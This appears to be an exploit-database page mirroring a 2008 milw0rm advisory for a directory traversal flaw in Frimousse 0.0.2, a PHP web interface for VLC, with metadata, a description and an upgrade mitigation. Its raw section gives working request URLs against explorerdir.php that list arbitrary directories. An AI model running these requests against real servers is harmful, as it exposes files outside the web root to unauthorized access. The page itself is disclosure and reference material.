header-logo
Suggest Exploit
vendor:
Frimousse
by:
Houssamix
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Frimousse
Affected Version From: 0.0.2
Affected Version To: 0.0.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:frimousseweb:frimousse
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Microsoft Windows
2008

Frimousse v.0.0.2 Directory Traversal Vulnerability

Frimousse is a freeplayer interface web written in php language, works with apache & php & VLC (media player). It is used for managing the playlist and viewing it in interface web with VLC media player. Frimousse runs on Linux and Microsoft Windows. A directory traversal vulnerability was discovered in Frimousse v.0.0.2, which allows an attacker to access arbitrary files and directories outside of the web root directory.

Mitigation:

Upgrade to the latest version of Frimousse.
Source

Exploit-DB raw data:

software : Frimousse v.0.0.2
vendor : http://frimousseweb.free.fr/

[+] Introduction
Frimousse is a freeplayer interface web written in php language , works with apache & php & VLC ( media player ) .
it is used for manage the playlist and view it in interface web with VLC media player .
Frimousse runs on Linux and  Microsoft Windows.

 apache & php & VLC are integred in setup of version for windows and attched with php archive for linux :

Frimousse 0.0.2 setup.exe   > http://frimousseweb.free.fr/files/Frimousse_0.0.2_setup.exe
Frimousse 0.0.2 minimal.rar  > http://frimousseweb.free.fr/files/Frimousse_0.0.2_minimal_install.rar

[+] vulnerability discovered by : Houssamix  from H-T Team 
H-T Team = HouSSaMix + ToXiC350 + RxH

[+] vulnerable version : Frimousse v.0.0.2 

{ BUG } : directory traversals  :

   => xpl > http://127.0.0.1:8080/explorerdir.php?name=[directory]
   => ex > http://127.0.0.1:8080/explorerdir.php?name=C:
             http://127.0.0.1:8080/explorerdir.php?name=C:\Program Files

------------------------------------------------------------------------------------------
-  H-T Team  -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims   --
------------------------------------------------------------------------------------------

# milw0rm.com [2008-01-20]

Navigation

Suggest Exploit

Services By CQR